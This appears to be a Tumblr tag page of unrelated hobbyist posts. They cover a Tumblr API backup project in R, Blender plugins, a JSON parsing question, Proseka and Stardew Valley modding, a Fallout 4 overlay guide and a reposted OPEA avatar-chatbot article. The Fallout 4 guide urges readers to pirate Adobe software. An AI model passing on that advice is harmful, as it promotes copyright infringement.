#FOR JSON PATH

Text

Here’s the third exciting installment in my series about backing up one Tumblr post that absolutely no one asked for. The previous updates are linked here.

Previously on Tumblr API Hell

Some blogs returned 404 errors. After investigating with Allie's help, it turns out it’s not a sideblog issue — it’s a privacy setting. It pleases me that Tumblr's rickety API respects the word no.

Also, shoutout to the one line of code in my loop that always broke when someone reblogged without tags. Fixed it.

What I got working:

Tags added during reblogs of the post

Any added commentary (what the blog actually wrote)

Full post metadata so I can extract other information later (i.e., outside the loop)

New questions I’m trying to answer:

While flailing around in the JSON trying to figure out which blog added which text (because obviously Tumblr’s rickety API doesn’t just tell you), I found that all the good stuff lives in a deeply nested structure called trail. It splits content into HTML chunks — but there’s no guarantee about order, and you have to reconstruct it yourself.
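A minimal sketch of pulling "who wrote what" out of trail, in Python rather than the R the series uses. The field names (`blog.name`, `content_raw`, `content`) are assumptions about how the legacy post JSON is laid out, and `sample_post` is made-up data, so check both against a real response first.

```python
from html.parser import HTMLParser


class _TextOnly(HTMLParser):
    """Collects only the text nodes of an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_data(self, data):
        self.parts.append(data)


def strip_html(fragment):
    """Return the plain text inside an HTML chunk."""
    parser = _TextOnly()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.parts).strip()


def commentary_by_blog(post):
    """List (blog name, plain text) pairs, one per trail entry.

    Assumed field names: trail[].blog.name, trail[].content_raw, trail[].content.
    Entries are returned in the order they appear; no reordering is attempted.
    """
    rows = []
    for item in post.get("trail") or []:
        blog = (item.get("blog") or {}).get("name", "<unknown>")
        html = item.get("content_raw") or item.get("content") or ""
        rows.append((blog, strip_html(html)))
    return rows


# Hypothetical data, shaped like the assumed trail structure.
sample_post = {
    "trail": [
        {"blog": {"name": "original-poster"}, "content_raw": "<p>first version</p>"},
        {"blog": {"name": "reblogger"}, "content_raw": "<p>added <b>commentary</b></p>"},
    ]
}

print(commentary_by_blog(sample_post))
```

Posts with no trail at all come back as an empty list instead of breaking the loop.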

Here’s a stylized diagram of what trail looks like in the JSON list (which gets parsed as a data frame in R):

I started wondering:

Can I use the trail to reconstruct a version tree to see which path through the reblog chain was the most influential for the post?

This would let me ask:

Which version of the post are people reblogging?

Does added commentary increase the chance it gets reblogged again?

Are some blogs “amplifiers” — their version spreads more than others?
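One possible way to start on these questions, sketched in Python: treat the ordered list of (blog, post id) pairs in a reblog's trail as that reblog's "version", then count how many reblogs carry each version. The field names and the sample reblogs are assumptions for illustration, not confirmed API behavior.

```python
from collections import Counter


def trail_signature(post):
    """Identify a version of the post by the (blog, post id) pairs in its trail.

    Assumed field names: trail[].blog.name and trail[].post.id.
    """
    return tuple(
        ((item.get("blog") or {}).get("name"), (item.get("post") or {}).get("id"))
        for item in post.get("trail") or []
    )


def version_counts(reblogs):
    """How many reblogs carry each distinct version of the post."""
    return Counter(trail_signature(post) for post in reblogs)


def blog_reach(reblogs):
    """For each blog, how many reblogs include that blog's addition in their trail."""
    reach = Counter()
    for post in reblogs:
        for blog in {name for name, _ in trail_signature(post)}:
            reach[blog] += 1
    return reach


# Hypothetical reblogs: one of the bare original, two of the version "amp" added to.
original = {"blog": {"name": "op"}, "post": {"id": "1"}}
addition = {"blog": {"name": "amp"}, "post": {"id": "2"}}
sample_reblogs = [
    {"trail": [original]},
    {"trail": [original, addition]},
    {"trail": [original, addition]},
]

print(version_counts(sample_reblogs).most_common(1))
print(blog_reach(sample_reblogs))
```

A full version tree would also need parent links between signatures. Here a parent is just the signature with its last element dropped.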

It’s worth thinking about these questions now — so I can make sure I’m collecting the right information from Tumblr’s rickety API before I run my R code on a 272K-note post.

Summary

Still backing up one post. Just me, 600+ lines of R code, and Tumblr’s API fighting it out at a Waffle House parking lot. The code’s nearly ready: I’m almost finished testing it on an 800-note post before trying it on my 272K-note Blaze post. Stay tuned…

Zero fucks given?

If you give zero fucks about my rickety API series, you can block my data science tag, #a rare data science post, or #tumblr's rickety API. But if we're mutuals then you know how it works here - you get what you get. It's up to you to curate your online experience. XD

#a rare data science post#tumblr's rickety API#fuck you API user#i'll probably make my R code available in github#there's a lot of profanity in the comments#just saying

24 notes


Text

Crisps' Basic Blender Plugins

I made two basic Blender plugins, one to easily center objects in the scene, and the other to easily remove and re-add numbering from bone names.

Both plugins require Blender 2.8 or above. They were tested in Blender 2.9, 3.6 and 4.0 on Windows. (Please report if anything explodes so that I can fix it. I've not coded much for Blender before so these are probably wonky.)

Both are found in the Item tab in Object mode.

Basic Move Tool

Save a few clicks sitting objects’ asses on the scene origin.

Sit Selected at Scene Origin

Moves all selected Mesh, Curve and Text/Font objects to the scene’s origin, their lowest points at height zero. The objects’ own origins (pivot points) move with them, but keep their relative positions in object space.

Sit Selected & its Origin(s) at Scene Origin

Moves all selected objects to the scene’s origin, their lowest points at height zero. Their origins (pivot points) are also moved there.

! Apply -> Rotation to your objects before use if they’ve been rotated. I use bounding box information to calculate objects’ lowest points. Bounding boxes are automatically updated when an object is translated or scaled, but not on rotation 🤔
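The bounding-box idea can be sketched in plain Python. This is not the plugin's code. It assumes the eight corners are already in world space (inside Blender that would typically mean multiplying each `obj.bound_box` corner by `obj.matrix_world`) and that "at the scene origin" means centering the box's footprint on X and Y. The function name is hypothetical.

```python
def sit_translation(world_corners):
    """Return the (dx, dy, dz) move that sits a bounding box on the scene origin.

    world_corners: iterable of (x, y, z) bounding-box corners in world space.
    Assumption: the box footprint is centered on X/Y and its lowest point
    ends up at height zero.
    """
    xs, ys, zs = zip(*world_corners)
    center_x = (min(xs) + max(xs)) / 2
    center_y = (min(ys) + max(ys)) / 2
    return (-center_x, -center_y, -min(zs))


# A 2x2x2 box spanning (1, 1, 2) to (3, 3, 4).
corners = [(x, y, z) for x in (1, 3) for y in (1, 3) for z in (2, 4)]
print(sit_translation(corners))
```

Adding the returned offset to an object's location moves the object and its origin together, so the origin keeps its position relative to the mesh.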

Bone Name Manager

Remove a substring/pattern from bones’ names; save and restore the originals via save file. The default pattern is “#\d+$”: “#” followed by numbers at the end of the name string.

I created this one because the GMDC Import/Export plugin requires the bones to be numbered, but that breaks the symmetry mode for weight painting. I wanted an easy alternative to renaming and re-renaming them by hand.

Use Custom Regex?

If ticked, the plugin will use the specified regular expression instead of its default pattern. Only the first match found in a name will be taken into account.

Strip Bone Names

Removes elements matching the pattern from bones’ names. The original names are not saved.

Save Bone Names to File

Creates a json file listing and mapping stripped and original bone names to each other. Uses the Save Path. The bones are not renamed.

Strip Bone Names and Save to File

Creates a json file listing and mapping stripped and original bone names to each other. Uses the Save Path. Removes elements matching the pattern from bones’ names.

Restore Bone Names from File

From a valid json file, loads the mapping of stripped to original names and renames bones accordingly. Uses the Load Path. Will fail if the current pattern is different from the one used by the file.
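For illustration, the strip/save/restore cycle could look roughly like this in plain Python. The JSON layout (`pattern` plus a `names` mapping) and the function names are assumptions. The plugin's real file format is not described in the post.

```python
import json
import re

DEFAULT_PATTERN = r"#\d+$"  # "#" followed by digits at the end of the name


def strip_name(name, pattern=DEFAULT_PATTERN):
    """Remove only the first match of the pattern from a bone name."""
    return re.sub(pattern, "", name, count=1)


def build_mapping(names, pattern=DEFAULT_PATTERN):
    """Map stripped names back to originals (hypothetical file layout)."""
    return {"pattern": pattern, "names": {strip_name(n, pattern): n for n in names}}


def restore_names(stripped, mapping, pattern=DEFAULT_PATTERN):
    """Look up original names; refuse if the file was made with another pattern."""
    if mapping["pattern"] != pattern:
        raise ValueError("pattern differs from the one stored in the file")
    return [mapping["names"].get(name, name) for name in stripped]


bones = ["l_hand#12", "r_hand#13", "spine"]
saved = json.dumps(build_mapping(bones))           # what would be written to disk
stripped = [strip_name(b) for b in bones]          # names without numbering
print(stripped)
print(restore_names(stripped, json.loads(saved)))  # round trip back to the originals
```

Two bones whose stripped names collide would overwrite each other in this mapping, so a real tool would need to detect that case.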

-> Download both at Box or SimFileShare

(I'm not sure about the ethics of putting non-sims stuff on SimFileShare, so I may remove that link.)

43 notes


Text

would it be possible to like... ask for programming advice? there's some really smart ppl around and to be honest I've confused myself a bit too much perhaps haha. explaining more below the cut because it's a bit of a lengthy explanation.

essentially I'm trying to parse an ID string into the way I'm formatting my json files. the format looks like this:

{

"name" : (name, string),

"id" : (id, string, they look like "e[a]" or "d[e[a]]^o.d.o" or something like that, there's a lot of variety),

"op_count" : (int, the number of individual runes combined to create this one. Each rune could be made up of smaller runes, so if I know which runes are in it I can reduce the op_count by combining those rather than each one individually),

"operations" : {

"base": {

"path" : (filepath to that rune's json, optional)

(if "path" isn't here, then either it already has the json, or else it's empty, as is the case for a combination like "('[n.k.n.k]', o)" which begins with a group rather than a single rune)

},

"op": (either one or sometimes two characters specifying which operation is performed),

"mod" : {

(Follows the same structure as "base")

}

}

}

there's a couple more quirks to this. If there's multiple operations, then each operation and mod will be "op#" and "mod#" with # being which operation it is. Grouping symbols like "[", "(", "'[", or "'(" follow a slightly different format for applying an operation, they instead become part of the mod, without really advancing the count of the mod# unless it's something like a group within a group. Here's an example of a completed one, I've done a number of these by hand which is why I have it:

{
  "name": "Laughing",
  "id": "('[n.k.n.k]', o)",
  "op_count": 3,
  "operations": {
    "base": {},
    "op1": "",
    "mod": {
      "type": "()",
      "mod1": {
        "type": "'[]'",
        "mod1": { "path": "res://scripts/json/yes.json" },
        "op2": ".",
        "mod2": { "path": "res://scripts/json/yes.json" }
      },
      "op3": ",",
      "mod3": { "path": "res://scripts/json/action.json" }
    }
  }
}

Because I've done a number of these by hand already, I'd rather not change the format, but if it's absolutely necessary then I'll push on through.

I've gotten it so that I have a list of each composite rune ID as well as a list of how many operations have been performed by the time that ID appears in the list, and a second list of each operation (opening and closing a group are considered separate operations until they're in the json, so that I can figure out where a group ends) and how many rune IDs have been seen by the time that operation is performed.

This sort of allows me to cross reference the list to get an idea of what happens where, but I've driven my brain right out of my head trying to figure out how to use these to get a string like "a.(b,c)" to turn into something like:

{

"name" : (name),

"id" : "a.(b,c)",

"op_count": 2,

"operations":{

"base": { (data for "a") },

"op1": ".",

"mod": {

"type" : "()",

"mod1": { (data for "b") },

"op2" : ",",

"mod2": { (data for "c") }

} } }

I don't know if I've made any sense at all, I'm not a bad programmer I promise I've just spun myself in circles over this 😅

no need to worry about where I get the data for "a," "b," and "c," that part's taken care of. Just need to parse the id string into the json format if I can.
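One way to approach this is a small recursive-descent parser with a single running operation counter, sketched here in Python. Everything in it is an assumption read off the two examples above: runes are single characters, the operators are ".", "," and "^", groups are "(...)" and "[...]" (the quoted "'[" and "'(" variants are not handled), a group operand at the top level is stored under "mod", and `{"rune": ...}` is a placeholder for the real rune data.

```python
import json

OPS = {".", ",", "^"}          # assumed operator characters
GROUPS = {"(": ")", "[": "]"}  # assumed grouping pairs


class IdParser:
    def __init__(self, text):
        self.tokens = [ch for ch in text if not ch.isspace()]
        self.pos = 0
        self.op_n = 0  # operations seen so far, shared across nesting levels

    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def take(self):
        tok = self.peek()
        if tok is None:
            raise ValueError("unexpected end of id string")
        self.pos += 1
        return tok

    def take_op(self):
        tok = self.take()
        if tok not in OPS:
            raise ValueError(f"expected an operator, got {tok!r}")
        self.op_n += 1
        return tok

    def operand(self):
        tok = self.take()
        if tok in GROUPS:
            return self.group(tok)
        if tok in OPS or tok in GROUPS.values():
            raise ValueError(f"expected a rune or group, got {tok!r}")
        return {"rune": tok}  # placeholder for the rune's real data

    def group(self, opener):
        closer = GROUPS[opener]
        node = {"type": opener + closer}
        # Opening a group does not advance the counter: its first member
        # reuses the number of the operation that introduced the group.
        first_key = f"mod{self.op_n}"
        node[first_key] = self.operand()
        while self.peek() != closer:
            op = self.take_op()
            n = self.op_n  # capture before a nested group can advance it
            node[f"op{n}"] = op
            node[f"mod{n}"] = self.operand()
        self.take()  # consume the closing bracket
        return node

    def parse(self):
        ops = {}
        if self.peek() in GROUPS:
            # An id that starts with a group gets an empty base and an empty op1.
            self.op_n = 1
            ops["base"], ops["op1"] = {}, ""
            ops["mod"] = self.operand()
        else:
            ops["base"] = self.operand()
        while self.peek() is not None:
            op = self.take_op()
            n = self.op_n
            ops[f"op{n}"] = op
            operand = self.operand()
            ops["mod" if "type" in operand else f"mod{n}"] = operand
        return {"op_count": self.op_n, "operations": ops}


def parse_id(text):
    return IdParser(text).parse()


print(json.dumps(parse_id("a.(b,c)"), indent=2))
```

Under those assumptions this reproduces the target shape for "a.(b,c)". Two groups at the top level would both want the "mod" key, which the examples do not cover, so that case needs a decision before relying on this.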

#programming#wizardposting#game dev#programming help#tumblr is not stack overflow#and I'm hoping that means people will be nicer than if I ask there#I get the feeling that this is a dumb problem I've created for myself#so I ask for help

12 notes


Text

Got thinking about my dream Kaimei-Focus Proseka Event and naturally came to wonder how hard it would be to create your own, "playable" project sekai story.

After doing some digging, it's definitely viable!

sekai.best provides the characters' live2d models and animations, and you can even download all this data which includes what I assume are the json files that make the animations work, as well as the textures. I've never actually worked with live2d before, but from what I can tell this seems to be the case.

Getting the textboxes is likely self-explanatory if you know how to path the json files for your format of choice, and so is adding the dialogue.

From there you can either A) Compile those animations and integrate them into a video (this AfterEffects plugin may be useful), which would have an end result akin to an event playthrough video, or B) Integrate the files into a visual novel engine of your choice (Ren'py notably has live2d support) to get a slightly more "playable" experience.

sekai.best also has the sound assets used in the stories, which, while I don't feel they're all that vital, are nice to have. You can even add the short voice fragments the characters use when the scene isn't fully voiced if you feel like it.

Then it's just a matter of making any CGs you want and adding them in.

I'm a bit too busy to do this myself, but if this inspires anyone to do so, feel free! (I just ask that you distribute the base framework/pathing/tools/etc for your format of choice so I can piggyback off your effort and make KAIMEI! HEAVEN! NOW! lol)

Someone could also theoretically compile all these available resources and make a generator similar to objection.lol -- sekai.best seems to be cooking up a live2d viewer for existing stories, and once that gets figured out, one could probably rework it into a story generator.

8 notes


Text

🧠 stardew valley

mod list ③ 🧠

⚙️Modding Tools

🧠Alternative Textures

🧠SpaceCore

🧠Custom Companions

🧠Content Patcher

🧠Json Assets

🧠SMAPI - Stardew Modding API

🧠Anti-Social NPCs

🧠Fashion Sense

🧠Dynamic Game Assets

🧠Generic Mod Config Menu

🧸New Characters

🧠Hat Mouse Lacey

🧠Fievel Goes East Scarp - Hat Mouse NPC

🧠Ancient History - A Museum Expansion mod

🧠The Fishmonger - Custom NPC

🧠Never Ending Adventure - NPC Mateo

🧠Alecto the Witch (new NPC)

🧠Jorts and Jean the Helper Cats - New Custom NPCs

🧠Traveling Dreamer

🧠Lavril - East Scarp NPC (King's Raid)

🧠Creative Differences - NPC Rodney (East Scarp)

🧠Professor Jasper Thomas

🧠Mister Ginger (cat NPC)

🧠Juliet and Jessie the Joja Clerks

🐈Pets / Horses

🧠Pet Hats

🧠Rabbit Mount

🧠Otter's Horse Mod 2.0 -Alternative Textures-

🧠BlueWind95 Cat Sphynx Replacer

🖥️User Interface

🧠Event Lookup

🧠Jolly Rainbow Interface

🧠Better Shop Menu

🧠Lookup Anything

🧠Shipping Collection Sorted By Mods

🧠NPC Map Locations

🧠Custom Menu Background

🧠Gift Taste Helper

🧠Ridgeside Village Better Artisan Good Icons

🧠Better Artisan Good Icons Fix

🧠Better Artisan Good Icons

🧠Chests Anywhere

🌼Visuals and Graphics

🧠Seasonal Special Order Board Retexture

🧠(AT) Cute Pink and White Craftables for Alternative Textures

🧠Some Pastel Craftables for Alternative Textures

🧠Missy's Walls and Floors for Alternative Textures

🧠Skell's Flowery Weapons

🧠Skell's Flowery Tools

🧠Pastel Foliage

🧠IdaIda's Seasonal Flooring and Paths (for CP and AT)

🧠Rainbow Fairy Mushroom Trees for Alternative Textures

🧠Fancy Crops and Forage Retexture

🧠Fancy Trash and Resources Retexture

🧠Lumisteria More Flowery Grass - Eemie Palette

🧠Sharp Gemstones

🧠Fancy Artisan Goods Icons Retexture

🧠Fancy Artisan Goods Icons BAGI Pack

🧠Food on table for Alternative Textures

🧠Wildflour's Better Artisan Goods Icon Pack

🧠Cuter Mines (Content Patcher)

🧠Pam Bus - Content Patcher

🧠(AT)Garden Decoration lightning rod

🧠(CP) RoseDryad's Plant Sprinklers

🧠Garden Village Retexture

🧠Label your fridges with Alternative Textures

🧠(CP) Victorian Craftables

🧠NPCs as Chests

🧠Wildflower Grass Field

🧠More Grass

🧠Visible Fish - see catchable fish in the water

#game#stardew mods#stardew valley#stardew valley decoration#stardew valley mod#stardew valley mods#stardew valley mod list

103 notes


Text

ok so i still cant find the json path BUT i managed to wipe out tumblr live and ad free browsing with another addon(Print Edit WE). because idk how to revert the view so heres a ms paint version

1. execute the addon

2. pick all three of the elements and delete them

3. click "close" and refresh the page

49 notes


Note

hello do you have any tutorials for babys first fo4 overlay? i have a little bit of experience directly editing textures in nv but fo4 overlays are melting my brain

I don't know if there are any tutorials actually ha. I struggle with following along to videos so everything I know I know from pulling apart other mods. Making overlays can be a huge pain in the ass but it's more time consuming than hard.

You'll need Notepad++ to edit the json files, these are read by F4SE/looksmenu to inject things into the game. You also need amd compressonator or icestorms texture toolbox to compress the dds textures. Don't use the nvidia compressor, it doesn't use the right format for face textures. You'll also need material editor to edit the material files for body overlays.

Different textures need different formats, I use irfanview with the dds plugin to open files from the base game to check what kind of compression I need. Fo4 uses BC1, BC3 and BC5. You can also use BC7 for some diffuse textures, though it doesn't work with face textures.

If you've already made texture edits I'll assume you know how to work with dds files. Face tints support _d _n and _s textures, body overlays only support _d textures. If you want to add any custom normals or spec/gloss details to a characters body you are better off using unique player.

I use substance painter to make my textures and photoshop to put them into properly formatted .tga or .png files to be converted. I pay money for them because I'm a chump but you should just pirate them fuck adobe.

There should be an example file for overlays on the looksmenu page. I think there are a couple of guides to overlays on nexusmods, but I found it more useful to download existing mods and see how other authors set up their files. THIS is an essential writeup on setting up the json files for face tints. Both face and body overlays need an .esp file to load the F4SE files, the plugin is empty just copy one from one of my mods and rename it.

Usually when I make a new mod I take one of my old ones that's already working and edit it to do what I need, rather than starting from scratch. You have full permission to use anything from any of my mods to make your own. This one has a big variety of face tints. This one has a couple of body overlays. I used to have better examples on my google drive but I had to delete all my tattoo overlays to save space oops... Just download a bunch from other authors and poke around their material files to see how they get different effects.

Note if you have any formatting errors in your json files the game will crash on launch. It will also do this if you don't delete any .bak files that notepad++ might create in the same directory. If you can select the overlay/tint in game but it doesn't appear then you either have a typo in the path or a formatting error in the texture. Or the game hates you.
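A quick pre-flight check along these lines can catch both problems before launching the game. This is only a sketch: it uses Python's strict JSON parser, which may be pickier or more lenient than whatever F4SE/looksmenu uses, and the demo builds a throwaway folder, so point it at your own mod directory instead.

```python
import json
import tempfile
from pathlib import Path


def check_overlay_dir(folder):
    """Report .json files that fail to parse and leftover .bak files."""
    problems = []
    for path in sorted(Path(folder).rglob("*")):
        if not path.is_file():
            continue
        suffix = path.suffix.lower()
        if suffix == ".bak":
            problems.append(f"{path.name}: leftover backup file")
        elif suffix == ".json":
            try:
                # utf-8-sig also accepts files saved with a byte-order mark
                json.loads(path.read_text(encoding="utf-8-sig"))
            except (json.JSONDecodeError, UnicodeDecodeError) as exc:
                problems.append(f"{path.name}: {exc}")
    return problems


# Demo on a temporary folder with one good file, one broken file, one backup.
with tempfile.TemporaryDirectory() as tmp:
    Path(tmp, "good.json").write_text('[{"ID": "demo"}]', encoding="utf-8")
    Path(tmp, "bad.json").write_text('[{"ID": "demo",}]', encoding="utf-8")
    Path(tmp, "good.json.bak").write_text("[]", encoding="utf-8")
    demo_problems = check_overlay_dir(tmp)

for line in demo_problems:
    print(line)
```

The trailing comma in bad.json is the kind of formatting error that is easy to miss by eye.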

10 notes


Text

Open Platform For Enterprise AI Avatar Chatbot Creation

How can an AI avatar chatbot be built with the Open Platform For Enterprise AI (OPEA) framework?

I. Flow Diagram

The diagram shows the application’s overall flow. The “Avatar Chatbot” example in the Open Platform For Enterprise AI GenAIExamples repository serves as the code sample. The flowchart highlights the “AvatarChatbot” megaservice, the application’s central component. The megaservice coordinates four distinct microservices, Automatic Speech Recognition (ASR), Large Language Model (LLM), Text-to-Speech (TTS), and Animation, and links them into a Directed Acyclic Graph (DAG).

Every microservice manages a specific avatar chatbot function. For instance:

Automatic Speech Recognition (ASR) is voice recognition software that converts spoken words into text.

The Large Language Model (LLM) interprets the user’s query from the text transcribed by ASR and produces the relevant text response.

A Text-to-Speech (TTS) service converts the text response produced by the LLM into audible speech.

The Animation service combines the audio response from TTS with the user-defined AI avatar picture or video and makes sure that the avatar’s lip movements match the speech. It then produces a video of the avatar conversing with the user.

The user inputs are an audio question and a visual input (an image or video). The output is a face-animated avatar video. Users hear the audible response and watch the chatbot speak naturally, so they receive near-real-time feedback from the avatar chatbot.

Create the “Animation” microservice in the GenAIComps repository

To add a new microservice such as “Animation,” we need to register it under comps/animation:

Register the microservice

@register_microservice(
    name="opea_service@animation",
    service_type=ServiceType.ANIMATION,
    endpoint="/v1/animation",
    host="0.0.0.0",
    port=9066,
    input_datatype=Base64ByteStrDoc,
    output_datatype=VideoPath,
)
@register_statistics(names=["opea_service@animation"])

After registration, we specify the callback function that is invoked when this microservice runs. In the “Animation” case, this is the “animate” function, which accepts a “Base64ByteStrDoc” object as input audio and returns a “VideoPath” object with the path to the generated avatar video. From “animation.py,” it sends an API request to the “wav2lip” FastAPI endpoint and retrieves the response in JSON format.

Remember to import it in comps/__init__.py and add the “Base64ByteStrDoc” and “VideoPath” classes in comps/cores/proto/docarray.py!

This link contains the code for the “wav2lip” server API. Incoming audio Base64Str and user-specified avatar picture or video are processed by the post function of this FastAPI, which then outputs an animated video and returns its path.

The steps above create the functional block for the microservice. To let the user launch the “Animation” microservice and build the required dependencies, we must create a Dockerfile for the “wav2lip” server API and another for “Animation.” For instance, Dockerfile.intel_hpu starts from the PyTorch* installer Docker image for Intel Gaudi and ends by executing a bash script called “entrypoint.”

Create the “AvatarChatbot” Megaservice in GenAIExamples

The megaservice class AvatarChatbotService will be defined initially in the Python file “AvatarChatbot/docker/avatarchatbot.py.” Add “asr,” “llm,” “tts,” and “animation” microservices as nodes in a Directed Acyclic Graph (DAG) using the megaservice orchestrator’s “add” function in the “add_remote_service” function. Then, use the flow_to function to join the edges.
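To make the add/flow_to idea concrete, here is a toy stand-in written in plain Python. It is not OPEA's orchestrator: `ToyOrchestrator`, its `run` method, and the stub services are all hypothetical, and services are identified by name strings here, which may differ from how the real orchestrator refers to them.

```python
from collections import defaultdict


class ToyOrchestrator:
    """Minimal DAG holder: nodes are callables, edges say who feeds whom."""

    def __init__(self):
        self.services = {}
        self.edges = defaultdict(list)

    def add(self, name, fn):
        """Register a service as a node; returns self so calls can be chained."""
        self.services[name] = fn
        return self

    def flow_to(self, src, dst):
        """Add a directed edge from one registered service to another."""
        if src not in self.services or dst not in self.services:
            raise KeyError("both services must be added before linking them")
        self.edges[src].append(dst)

    def run(self, start, payload):
        """Walk a linear chain from `start`, passing each output to the next node."""
        name = start
        while True:
            payload = self.services[name](payload)
            successors = self.edges.get(name)
            if not successors:
                return payload
            name = successors[0]


# Stub services that only label what they would do.
orchestrator = ToyOrchestrator()
orchestrator.add("asr", lambda audio: f"text({audio})")
orchestrator.add("llm", lambda text: f"reply({text})")
orchestrator.add("tts", lambda reply: f"speech({reply})")
orchestrator.add("animation", lambda speech: f"video({speech})")

orchestrator.flow_to("asr", "llm")
orchestrator.flow_to("llm", "tts")
orchestrator.flow_to("tts", "animation")

result = orchestrator.run("asr", "audio")
print(result)
```

In the real example each node is a remote microservice reached over HTTP, not a local function, but the graph wiring follows the same asr, llm, tts, animation order.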

Specify megaservice’s gateway

A gateway is the interface through which users access the megaservice. The AvatarChatbotGateway class is defined in the Python file GenAIComps/comps/cores/mega/gateway.py. The AvatarChatbotGateway holds the host, port, endpoint, input and output datatypes, and the megaservice orchestrator. It also provides a handle_request function that schedules sending the initial input, together with parameters, to the first microservice and gathers the response from the last microservice.

Finally, we must create a Dockerfile so that users can quickly build the AvatarChatbot backend Docker image and launch the “AvatarChatbot” example. The Dockerfile includes scripts to install the required GenAI dependencies and components.

II. Face Animation Models and Lip Synchronization

GFPGAN + Wav2Lip

Wav2Lip is a state-of-the-art lip-synchronization method that uses deep learning to precisely match audio and video. Wav2Lip includes:

A pre-trained expert lip-sync discriminator that can accurately detect sync in real videos

A modified LipGAN model to produce a frame-by-frame talking face video

In the pretraining phase, the expert lip-sync discriminator is trained on the LRS2 dataset to estimate the likelihood that an input video-audio pair is in sync.

A LipGAN-like architecture is employed during Wav2Lip training. The generator contains a visual encoder, a speech encoder, and a face decoder, all three built from stacks of convolutional layers. The discriminator also consists of convolutional blocks. The modified LipGAN is trained like other GANs: the discriminator is trained to distinguish frames produced by the generator from the ground-truth frames, and the generator is trained to minimize the adversarial loss based on the discriminator’s score. In total, the generator is trained by minimizing a weighted sum of the following loss components:

An L1 reconstruction loss between the generated and ground-truth frames

A synchronization loss between the input audio and the output video frames, scored by the lip-sync expert

An adversarial loss between the generated and ground-truth frames, based on the discriminator score
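Written out, the weighted sum described above has the following general shape. The symbols and the weights $\lambda$ are placeholders chosen for illustration. The text does not give their values.

```latex
% Generic form of the generator objective (weights are unspecified placeholders)
L_{\text{total}} = \lambda_{\text{rec}}\, L_{\text{rec}}
                 + \lambda_{\text{sync}}\, L_{\text{sync}}
                 + \lambda_{\text{adv}}\, L_{\text{adv}},
\qquad
L_{\text{rec}} = \frac{1}{N} \sum_{i=1}^{N} \lVert \hat{y}_i - y_i \rVert_1
```

Here $\hat{y}_i$ is a generated frame, $y_i$ the matching ground-truth frame, and $N$ the number of frames.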

At inference time, we provide the audio speech from the previous TTS block and the video frames containing the avatar figure to the Wav2Lip model. The trained Wav2Lip model then produces a lip-synced video in which the avatar speaks the speech.

The Wav2Lip-generated video is lip-synced, but the resolution around the mouth region is reduced. To enhance the face quality in the produced video frames, we can optionally add a GFPGAN model after Wav2Lip. GFPGAN performs face restoration: it predicts a high-quality image from an input facial image with unknown degradation. It combines a U-Net degradation removal module with a pretrained face GAN (such as StyleGAN2) used as a prior. Because the GFPGAN model is pretrained to recover high-quality facial detail in its output frames, the result is a more vivid and lifelike avatar.

SadTalker

In addition to Wav2Lip, SadTalker is another cutting-edge model option for facial animation. SadTalker is a stylized audio-driven talking-head video generation tool that produces the 3D motion coefficients (head pose and expression) of a 3D Morphable Model (3DMM) from audio. These coefficients are mapped to 3D key points and used to drive a 3D-aware face renderer applied to the input image. The result is a lifelike talking-head video.

Intel made it possible to use the Wav2Lip model on Intel Gaudi AI accelerators and the SadTalker and Wav2Lip models on Intel Xeon Scalable processors.

Read more on Govindhtech.com

#AIavatar#OPE#Chatbot#microservice#LLM#GenAI#API#News#Technews#Technology#TechnologyNews#Technologytrends#govindhtech

3 notes


Text

A Compiled List of My Stardew Valley Mods

I’ve recently gotten back into playing Stardew on both my switch and my laptop and it’s so fun! So I thought I’d give a complete list of all the current mods I use in my gameplay <3

Note: These are PC mods. It’s not possible to mod on the switch port and only a few are compatible with android, but none are apple compatible.

Smapi is not included in this list, but is 100% required! These mods will not work without it!

𝓯𝓻𝓪𝓶𝓮𝔀𝓸𝓻𝓴 𝓶𝓸𝓭𝓼 💻

Content Patcher

Content Patcher Animations

Custom NPC Exclusions

Expanded Preconditions Utility

Extra Map Layers

Farm Type Manager (FTM)

Json Assets

SAAT - Audio API and Toolkit

Shop Tile Framework

SpaceCore

NPC Adventures

Event Repeater

Generic Mod Config Menu

Joja Cola Restock

AtraCore

Alternative Textures

DaisyNiko’s TileSheets

Lumisteria Tilesheets (Indoor and Outdoor)

Artisanal Soda Makers

The Grampleton Maker’s Market

Anti-Social NPCs

Better Artisan Good Icons

BugNet

Bush Bloom Mod

PyTK Lite

Champagne Wishes

Child to NPC

Custom Companions

Custom Fixed Dialogue

Custom Furniture

Custom Gift Dialogue

Custom Kissing Mod

Custom Music

Custom NPC Exclusions

Custom NPC Fixes

Destroyable Bushes

Fizzy Drinks

Ginger Island Mainland Adjustments

GNM Tokens

Help For Hire

Happy Birthday Content Pack

Huckleberry Season

Mail Framework Mod

More Mead

More Grass

Multi Yield Crops

Producer Framework Mod

Quest Framework Mod

Shop Tile Framework

Show Birthdays

Sprites in Detail

Stardew Hack

Stardust Core

TMX Loader

Dwarf Expansion

Boarding House

𝓔𝔁𝓹𝓪𝓷𝓼𝓲𝓸𝓷 𝓜𝓸𝓭𝓼 🪴

Stardew Valley Expanded

Ridgeside Village

East Scarp

Love Festival

Emyn’s Pride March

Emyn’s Queer Dialogue Expansion

Canon-Friendly Dialogue Expansion

Emyn’s Diverse Ginger Island

Immersive Festival Dialogue

𝓟𝓸𝓻𝓽𝓻𝓪𝓲𝓽 𝓜𝓸𝓭𝓼 ☀️

Seasonal Diverse Stardew Valley

Diverse Stardew Valley Expanded

Ridgeside Village Seasonal Outfits

East Scarp Seasonal Outfits

𝓐𝓮𝓼𝓽𝓱𝓮𝓽𝓲𝓬 𝓜𝓸𝓭𝓼 🩷

Stardew Foliage Redone

DaisyNiko’s Earthy Recolor

Way Back Pelican Town

Mushroom Mailbox

Idalda’s Gothic Buildings

Idalda’s Furniture Recolor

Idalda’s Craftables

Idalda’s Flooring and Paths

Idalda’s Wallpapers and Floors

Idalda’s Witchy Scarecrows

Aesthetic Garbage

Seasonal Bouquets

Cute / Seasonal Crab Pots

Seasonal Fences

Custom Menu Background

Elle’s Cat Replacements

Elle’s Dog Replacements

Elle’s New Barn Animals

Elle’s New Coop Animals

Elle’s New Horses

Elle’s Town Animals

Hot Spring Farm Cave

Industrial Furniture Set

Industrial Kitchen and Interior

Kelly’s Flower Dance Attire

Lavender Dreams UI Recolor

Rustic Country Town Interior

Seasonal Floral Bus

Seasonal Garden Farmhouse V2

Skell’s Flowery Tools

Skell’s Flowery Weapons

Replacements for Artifacts

Wildflower Grass Field

Calendar Anniversary

